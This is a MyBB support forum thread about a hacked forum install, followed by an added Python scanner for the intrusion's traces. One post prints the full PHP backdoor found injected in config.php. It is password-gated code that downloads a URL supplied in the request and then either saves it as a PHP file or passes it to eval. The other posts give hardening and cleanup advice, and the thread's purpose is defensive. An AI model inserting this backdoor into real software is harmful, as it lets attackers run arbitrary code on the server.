MyBB Community Forums

Full Version: Security Issue
After install I change the file to 644 but I believe 444 will be fine too.
Open the config.php file and check for any vulnerability script added inside it...

I believe after a few more blank lines there may be vulnerable code passing you information

check out the post
http://community.mybb.com/thread-105780-...#pid772311
You should also check with your host as some hosts automatically lower the chmods of files that are chmoded to 777.
This was in the config.php file :

if (isset($_GET['pingnow']) && isset($_GET['pass'])) {
    if ($_GET['pass'] == '5c971edc0b2cc92fc99b5a3609450cb7') {
        if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))) {
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0,100)).'.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
        }
        if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))) {
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
        }
    }
}
EDIT: I've just read your last post now... your file was seriously modified http://wiki.mybb.com/index.php/Inc/config.php

---------------------
I think it's a HOST action, too.

I'm hosted at Mediatemple Gridserver and I think that they have enabled a script to CHMOD to 0444 such plain text files with passwords, when uploaded. Default for other files is 0755.

Anyway, if \inc\config.php is not writable it's a good thing for your security. I see that warning in Maintenance under AdminCP and don't give an orange to it.

To increase security you can add in your-forum-url/inc/ this:

File: /inc/.htaccess

<files config.php>
Order allow,deny
Deny from all
</files>

<files .htaccess>
Order allow,deny
Deny from all
</files>
That's injection code. You're compromised.
What shall I do?
Delete the code, or just download and re-upload the most recent version of MyBB.
(2011-10-17, 04:27 PM) Paul H. wrote: Delete the code, or just download and re-upload the most recent version of MyBB.

That won't include config.php though, so upload all new MyBB code (download it again from the site today) and then upload it all.

Clean up the existing config.php.

Delete settings.php and let MyBB recreate it.

Secure your site, change passwords, run security checks on templates, browse your site's file system for odd files you don't recognize, etc.

My guess is that you should have an expert fix and secure this for you. It's likely that it's all backdoored and unless you're thorough to remove every trace of the exploit you'll just be compromised again.
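
An added example, not part of the thread and not MyBB code: a Python check for the traces this particular backdoor leaves, covering the injected constructs, content hidden below blank lines, and the file names its 'exec' branch can create (md5 of a number from 0 to 100, plus '.php'). The ten-blank-line threshold and the finding labels are assumptions.

```python
import hashlib
import os
import re
import sys

# Names the dropper shown above can create: md5(rand(0,100)).'.php' has only 101 outcomes.
DROPPED_NAMES = {hashlib.md5(str(n).encode()).hexdigest() + ".php" for n in range(101)}

# Constructs taken from the injected block. MyBB's own template calls are
# eval("...") with a string literal, so "eval of a variable" stays quiet on
# them, but a plugin may still trigger it: every hit is a lead to review by hand.
SIGNS = {
    "request input passed to curl_init": re.compile(r"curl_init\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "eval of a variable": re.compile(r"\beval\s*\(\s*\$"),
    "pingnow request parameter": re.compile(r"\$_GET\s*\[\s*['\"]pingnow['\"]\s*\]"),
}
# Assumed threshold: ten or more consecutive empty lines followed by more content.
BLANK_RUN = re.compile(r"\n(?:[ \t]*\r?\n){10,}")


def scan_file(path):
    """Return a list of reasons this PHP file deserves a manual look."""
    findings = []
    if os.path.basename(path) in DROPPED_NAMES:
        findings.append("file name is md5 of a number 0..100")
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings += [label for label, rx in SIGNS.items() if rx.search(text)]
    gap = BLANK_RUN.search(text)
    if gap and text[gap.end():].strip():
        findings.append("content after a long run of blank lines")
    return findings


def scan_tree(root):
    """Walk a forum directory and map each flagged .php path to its findings."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(folder, name)
                found = scan_file(path)
                if found:
                    report[path] = found
    return report


if __name__ == "__main__":
    for path, found in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(path + ": " + "; ".join(found))
```

Run it with the forum's root directory as the argument. An empty result does not prove the site is clean, since it only looks for this one backdoor's traces.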
